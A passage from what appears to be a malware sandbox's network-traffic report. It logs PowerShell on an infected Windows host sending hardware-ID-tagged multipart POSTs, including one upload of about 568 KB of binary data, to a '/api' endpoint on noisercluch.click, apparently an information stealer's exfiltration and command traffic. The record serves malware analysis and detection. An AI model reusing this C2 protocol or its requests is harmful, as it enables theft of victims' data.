6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 38 59 47 4a 4b Data Ascii: --8YGJKPGFYZMNNECContent-Disposition: form-data; name="hwid"F9303BDA56946A72D9AC212D15D33917--8YGJKPGFYZMNNECContent-Disposition: form-data; name="pid"2--8YGJKPGFYZMNNECContent-Disposition: form-data; name="lid"WG6I6S--web44--8YGJK
2025-01-01 16:11:18 UTC	1129	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 16:11:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lnih4m5hpp4ob9aovgkj7nc05c; expires=Sun, 27 Apr 2025 09:57:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yeiarOSdH0U6ddnIpkwQNClRwQEDIjd7Dg89TIOXTSCIUxWY6EgooKnTu1xuU6JjGLaw4pBrSlIDxlX5A5gyaahIjes9U1Ub1esxC4KlLdk0NE9ID49K4fOKoJ%2BVvu%2BsNtvyBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3c8ceba4f7c81-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1993&rtt_var=754&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2841&recv_bytes=9703&delivery_rate=1445544&cwnd=240&unsent_bytes=0&cid=a1b9a2c2ac03dd51&ts=526&x=0"
2025-01-01 16:11:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 16:11:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49881	188.114.96.3	443	1196	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 16:11:19 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=D2TMTQXT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20377 Host: noisercluch.click
2025-01-01 16:11:19 UTC	15331	OUT	Data Raw: 2d 2d 44 32 54 4d 54 51 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 44 32 54 4d 54 51 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 32 54 4d 54 51 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 44 32 54 4d 54 51 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 Data Ascii: --D2TMTQXTContent-Disposition: form-data; name="hwid"F9303BDA56946A72D9AC212D15D33917--D2TMTQXTContent-Disposition: form-data; name="pid"3--D2TMTQXTContent-Disposition: form-data; name="lid"WG6I6S--web44--D2TMTQXTContent-Disposit
2025-01-01 16:11:19 UTC	5046	OUT	Data Raw: 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00 Data Ascii: QMn 64F6(X&7~`aO@dR<x)
2025-01-01 16:11:19 UTC	1137	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 16:11:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d7cphios24n69rj2cacpjv93bi; expires=Sun, 27 Apr 2025 09:57:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCu3ZF8m8TAZ77qzOcB46ZglWRxLQti6lMntum8LNz%2FsVj%2BFjuC%2FqKUp7VTv2KfSYcpgSGqBgC4%2FDsBoNo%2BBYlLKJQIsAAV4WJa0QuAkf8vyC4MlJCET9AOPUiUjKmFa87MQrw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3c8d58b0042a5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1739&rtt_var=661&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21330&delivery_rate=1645070&cwnd=229&unsent_bytes=0&cid=6c0e97fcf7cf5138&ts=633&x=0"
2025-01-01 16:11:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 16:11:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49888	188.114.96.3	443	1196	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 16:11:20 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1P92F68DOIFX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1191 Host: noisercluch.click
2025-01-01 16:11:20 UTC	1191	OUT	Data Raw: 2d 2d 31 50 39 32 46 36 38 44 4f 49 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 31 50 39 32 46 36 38 44 4f 49 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 50 39 32 46 36 38 44 4f 49 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 31 50 39 32 46 36 38 44 4f 49 46 58 0d 0a Data Ascii: --1P92F68DOIFXContent-Disposition: form-data; name="hwid"F9303BDA56946A72D9AC212D15D33917--1P92F68DOIFXContent-Disposition: form-data; name="pid"1--1P92F68DOIFXContent-Disposition: form-data; name="lid"WG6I6S--web44--1P92F68DOIFX
2025-01-01 16:11:20 UTC	1136	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 16:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=57sn2e1k6614i5apj87jdpe88p; expires=Sun, 27 Apr 2025 09:57:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9I6Hfy0OUabS43gC%2BdB%2BjwhWsnVnp%2FXxx5kF9yxaE571sI6lD7UdYAcjCXNfd0lw9HgGeBN3edz43SFgD1KrSR90z%2BxvCMFCma8y%2BV5GEmX6%2BYB4dP4vTn6WrOWIHz9rhSlL5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3c8dd59214356-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1733&rtt_var=672&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2103&delivery_rate=1602634&cwnd=237&unsent_bytes=0&cid=ca187ad984f8ccb3&ts=424&x=0"
2025-01-01 16:11:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 16:11:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49899	188.114.96.3	443	1196	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 16:11:21 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Y28BDORX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 568376 Host: noisercluch.click
2025-01-01 16:11:21 UTC	15331	OUT	Data Raw: 2d 2d 59 32 38 42 44 4f 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 59 32 38 42 44 4f 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 32 38 42 44 4f 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 59 32 38 42 44 4f 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 Data Ascii: --Y28BDORXContent-Disposition: form-data; name="hwid"F9303BDA56946A72D9AC212D15D33917--Y28BDORXContent-Disposition: form-data; name="pid"1--Y28BDORXContent-Disposition: form-data; name="lid"WG6I6S--web44--Y28BDORXContent-Disposit
2025-01-01 16:11:21 UTC	15331	OUT	Data Raw: 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d 85 d2 b5 16 6a 06 95 e2 86 7e 23 94 8f 49 f2 39 93 f8 cc ec b4 d6 d5 15 c8 a9 1d 49 ab c2 6b 11 22 83 de ce 18 23 e6 27 2e de 19 f7 5c 51 63 9a 4c 35 b1 Data Ascii: <~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2\|B\|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]j~#I9Ik"#'.\QcL5
2025-01-01 16:11:21 UTC	15331	OUT	Data Raw: 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78 32 bf 7e 23 5d 02 9a d0 ae 25 37 a8 d7 51 e2 57 91 de b7 12 82 89 97 94 9b e0 a5 12 98 77 56 3d 57 d4 7a f1 96 e9 f1 60 25 25 88 38 fb 9a 87 38 39 b3 3e Data Ascii: 1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN\|xM*%T<_/5IIELX;"&#ysH {x2~#]%7QWwV=Wz`%%889>
2025-01-01 16:11:21 UTC	15331	OUT	Data Raw: 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5 03 fb 77 6f c4 fd 4e a8 21 f3 73 2e 11 0a 9a 96 b2 7d 39 1e 4e ba 58 c2 a6 80 52 43 3c 4e c8 ea ab 99 18 ea 1d 12 47 13 2c 5a e6 8b 34 06 15 81 a5 ae 25 Data Ascii: T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;woN!s.}9NXRC<NG,Z4%
2025-01-01 16:11:21 UTC	15331	OUT	Data Raw: 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa ea b7 65 14 eb 98 8b f7 ff 56 51 fc 7f 5f 10 9c 8d 84 47 02 b8 44 45 c6 36 04 1f 53 65 9c ed 0f 95 fd 8f 14 cd 53 01 d1 a1 e2 af bd e7 33 fe 89 f0 13 e1 Data Ascii: @h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>heVQ_GDE6SeS3
2025-01-01 16:11:21 UTC	15331	OUT	Data Raw: 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83 3f 0a 7d 47 87 c2 7a 44 5b 0f a4 d7 87 51 a8 75 b8 4c db 1f 53 5a 6d 53 2c 1b de 3d b8 6e 2b 4a e8 a1 72 76 d6 83 28 7b 90 af c3 03 f3 f6 c4 0b 93 eb d3 Data Ascii: TH[.!%'@tA&<\|<T\|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$\|wev^qPy{ohh"s:%PbUpacFG),?}GzD[QuLSZmS,=n+Jrv({
2025-01-01 16:11:21 UTC	15331	OUT	Data Raw: ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84 c2 0b 0d 5d be 7b f6 b3 2f 63 66 93 b7 96 a0 30 0a 97 41 fe 61 72 86 b3 fb 6e b0 75 73 42 6b 21 be ed e2 7e 14 6c 4b 04 f2 9b f6 f8 05 06 7e 25 96 2a 7d Data Ascii: ! {2'=n}Q'\YE~0}:\|O/.`(#~B\|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t\|CI]{/cf0AarnusBk!~lK~%*}
2025-01-01 16:11:21 UTC	15331	OUT	Data Raw: bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04 4d ca 30 90 70 bd 01 d8 31 ee 4d fd 0e 90 27 1c 61 2f 0a a8 f9 72 ef 5a 57 95 bd 95 e3 75 5b b1 1b 2b 6b 57 f3 4f d7 2f ec 11 d8 8b 0c af 46 30 7e 4a 5e Data Ascii: ].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?\|.j@Tz8PhSIaW)]u^R<M0p1M'a/rZWu[+kWO/F0~J^
2025-01-01 16:11:21 UTC	15331	OUT	Data Raw: 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d 98 36 98 ac 3a ce d4 1f 5f 3f 13 15 1a 20 32 20 94 ac f4 63 e6 a4 89 69 4d a7 c1 4a d8 7f 9b 1a 9e 21 18 a7 09 ff c7 7d ce da 81 6e 3d 94 3c 11 e8 ae cf Data Ascii: }a;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]6:_? 2 ciMJ!}n=<
2025-01-01 16:11:21 UTC	15331	OUT	Data Raw: 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9 9b 45 f0 ae ae c8 c7 44 f6 c8 e7 85 35 b1 fc cb b3 4c 8d d1 80 bc 4e 35 e7 13 32 19 ec b5 fd 36 68 ce 85 2b 44 6f 6c d9 49 17 53 23 2a 41 01 62 4e ac 28 Data Ascii: gj%,Wtn{\|.I;{^'U7?$mkPAc{`GHN\|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6ED5LN526h+DolIS#AbN(
2025-01-01 16:11:24 UTC	1141	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 16:11:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=238ilbh153k1o42a5rfll86o67; expires=Sun, 27 Apr 2025 09:58:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LjasnrJLRRI%2BlX%2FbJbrySOYL57hs6PmCSElIuOS%2BiS%2B8QDukvvW2uJr8V9C2fxomkqrCoMOWBcJAAAfMPVAspzIGZtT7zL%2FIHDaxEisaCe2THt9oo2xzyM8x9lPbIBpls53CdA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3c8e57b08425c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1609&rtt_var=618&sent=193&recv=582&lost=0&retrans=0&sent_bytes=2840&recv_bytes=570914&delivery_rate=1748502&cwnd=226&unsent_bytes=0&cid=fe4e6a973aea68b1&ts=2562&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49918	188.114.96.3	443	1196	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 16:11:24 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: noisercluch.click
2025-01-01 16:11:24 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 77 65 62 34 34 26 6a 3d 26 68 77 69 64 3d 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 Data Ascii: act=get_message&ver=4.0&lid=WG6I6S--web44&j=&hwid=F9303BDA56946A72D9AC212D15D33917
